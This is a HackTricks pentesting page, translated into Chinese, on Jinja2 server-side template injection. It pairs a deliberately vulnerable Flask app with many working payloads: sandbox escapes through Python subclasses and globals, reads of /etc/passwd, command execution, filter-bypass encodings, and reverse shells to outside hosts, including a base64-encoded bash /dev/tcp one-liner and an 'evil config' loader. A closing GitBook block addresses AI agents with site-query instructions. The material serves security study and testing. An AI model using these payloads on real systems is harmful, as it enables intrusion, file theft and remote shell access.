> For the complete documentation index, see [llms.txt](https://hacktricks.xsx.tw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacktricks.xsx.tw/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md). # Jinja2 SSTI
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) 支持HackTricks的其他方式: * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
## **实验** ```python from flask import Flask, request, render_template_string app = Flask(__name__) @app.route("/") def home(): if request.args.get('c'): return render_template_string(request.args.get('c')) else: return "Hello, send someting inside the param 'c'!" if __name__ == "__main__": app.run() ``` ## **其他** ### **调试语句** 如果启用了调试扩展,将会提供一个`debug`标签,用于转储当前上下文以及可用的过滤器和测试。这对于查看模板中可用的内容而无需设置调试器非常有用。 ```python 

{% debug %}
``` ### **转储所有配置变量** 源链接: ```python {{ config }} #In these object you can find all the configured env variables {% for key, value in config.items() %}
{{ key|e }}
{{ value|e }}
{% endfor %} ``` ## **Jinja注入** 首先,在Jinja注入中,您需要找到一种方法来**逃离沙盒**并恢复访问常规的Python执行流程。为此,您需要**滥用**来自**非沙盒环境**但在沙盒中可访问的**对象**。 ### 访问全局对象 例如,在代码`render_template("hello.html", username=username, email=email)`中,对象username和email**来自非沙盒的Python环境**,并将在**沙盒环境内**可访问。\ 此外,还有其他对象将**始终可以从沙盒环境中访问**,这些对象包括: ``` [] '' () dict config request ``` ### 恢复\ 然后,从这些对象中,我们需要到达类:**``**,以便尝试**恢复**定义的**类**。这是因为从这个对象中,我们可以调用\*\*`__subclasses__`**方法并**访问来自非沙盒\*\*python环境的所有类。 为了访问那个**对象类**,您需要**访问一个类对象**,然后访问\*\*`__base__`**,**`__mro__()[-1]`**或**`mro()[-1]`**。然后,在到达这个**对象类**之后,我们**调用\*\* **`__subclasses__()`**。 请查看这些示例: ```python # To access a class object [].__class__ ''.__class__ ()["__class__"] # You can also access attributes like this request["__class__"] config.__class__ dict #It's already a class # From a class to access the class "object". ## "dict" used as example from the previous list: dict.__base__ dict["__base__"] dict.mro()[-1] dict.__mro__[-1] (dict|attr("__mro__"))[-1] (dict|attr("\x5f\x5fmro\x5f\x5f"))[-1] # From the "object" class call __subclasses__() {{ dict.__base__.__subclasses__() }} {{ dict.mro()[-1].__subclasses__() }} {{ (dict.mro()[-1]|attr("\x5f\x5fsubclasses\x5f\x5f"))() }} {% with a = dict.mro()[-1].__subclasses__() %} {{ a }} {% endwith %} # Other examples using these ways {{ ().__class__.__base__.__subclasses__() }} {{ [].__class__.__mro__[-1].__subclasses__() }} {{ ((""|attr("__class__")|attr("__mro__"))[-1]|attr("__subclasses__"))() }} {{ request.__class__.mro()[-1].__subclasses__() }} {% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %} # Not sure if this will work, but I saw it somewhere {{ [].class.base.subclasses() }} {{ ''.class.mro()[1].subclasses() }} ``` ### RCE Escaping **已经恢复** `` 并调用 `__subclasses__`,现在我们可以使用这些类来读取和写入文件并执行代码。 调用 `__subclasses__` 给了我们机会**访问数百个新函数**,我们将很高兴只是通过访问**文件类**来**读取/写入文件**或任何具有访问**允许执行命令**的类的类(如 `os`)。 **读取/写入远程文件** ```python # ''.__class__.__mro__[1].__subclasses__()[40] = File class {{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }} {{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} ``` **远程代码执行(RCE)** ```python # The class 396 is the class {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} # Without '{{' and '}}'
a
# Calling os.popen without guessing the index of the class {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ## Passing the cmd line in a GET param {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} ## Passing the cmd line ?cmd=id, Without " and ' {{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }} ``` 了解更多可用于逃逸的**更多类**,您可以**检查**: {% content-ref url="/pages/3BPEOUUqev1SBMucQAtz" %} [Bypass Python sandboxes](/generic-methodologies-and-resources/python/bypass-python-sandboxes.md) {% endcontent-ref %} ### 过滤绕过 #### 常见绕过 这些绕过将允许我们**访问**对象的**属性**,而无需使用某些字符。\ 我们已经在先前的示例中看到了一些这些绕过的情况,但让我们在这里总结一下: ```bash # Without quotes, _, [, ] ## Basic ones request.__class__ request["__class__"] request['\x5f\x5fclass\x5f\x5f'] request|attr("__class__") request|attr(["_"*2, "class", "_"*2]|join) # Join trick ## Using request object options request|attr(request.headers.c) #Send a header like "c: __class__" (any trick using get params can be used with headers also) request|attr(request.args.c) #Send a param like "?c=__class__ request|attr(request.query_string[2:16].decode() #Send a param like "?c=__class__ request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join) # Join list to string http://localhost:5000/?c={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ #Formatting the string from get params ## Lists without "[" and "]" http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_ # Using with {% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %} ``` * [**点击此处查看更多访问全局对象的选项**](#accessing-global-objects) * [**点击此处查看更多访问对象类的选项**](#recovering-less-than-class-object-greater-than) * [**阅读此内容以在没有对象类的情况下获得RCE**](#jinja-injection-without-less-than-class-object-greater-than) **避免HTML编码** 默认情况下,Flask会对模板中的所有内容进行HTML编码,以确保安全性: ```python {{''}} #will be <script>alert(1);</script> ``` **`safe`** 过滤器允许我们将 JavaScript 和 HTML 注入到页面中,而**无需**对其进行**HTML 编码**,就像这样: ```python {{''|safe}} #will be ``` **通过编写恶意配置文件实现远程代码执行(RCE)。** ```python # evil config {{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # load the evil config {{ config.from_pyfile('/tmp/evilconfig.cfg') }} # connect to evil host {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` ## 没有几个字符 没有 **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`** ```python {%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%} ``` ## 无需使用 **\** 的 Jinja 注入 从[**全局对象**](#accessing-global-objects)中有另一种方法可以实现 **RCE 而无需使用该类。**\ 如果你设法访问到这些全局对象中的任何 **函数**,你将能够访问 **`__globals__.__builtins__`**,从那里 **RCE** 就非常 **简单**。 你可以通过以下方式从对象 **`request`**、**`config`** 和任何其他你可以访问的有趣的 **全局对象** 中 **找到函数**: ```bash {{ request.__class__.__dict__ }} - application - _load_form_data - on_json_loading_failed {{ config.__class__.__dict__ }} - __init__ - from_envvar - from_pyfile - from_object - from_file - from_json - from_mapping - get_namespace - __repr__ # You can iterate through children objects to find more ``` 一旦找到了一些函数,您可以使用以下方法恢复内置函数: ```python # Read file {{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }} # RCE {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }} {{ config.__class__.from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }} {{ (config|attr("__class__")).from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }} {% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("ls")["read"]() %} {{ a }} {% endwith %} ## Extra ## The global from config have a access to a function called import_string ## with this function you don't need to access the builtins {{ config.__class__.from_envvar.__globals__.import_string("os").popen("ls").read() }} # All the bypasses seen in the previous sections are also valid ``` ## 参考资料 * * 检查[此处的attr技巧以绕过被列入黑名单的字符](/generic-methodologies-and-resources/python/bypass-python-sandboxes.md#python3)。 * *
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! 支持HackTricks的其他方式: * 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。 * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://hacktricks.xsx.tw/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.